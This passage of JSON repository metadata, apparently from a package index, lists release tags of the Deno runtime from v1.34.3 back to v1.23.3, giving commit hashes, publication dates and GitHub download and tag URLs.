a1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.gi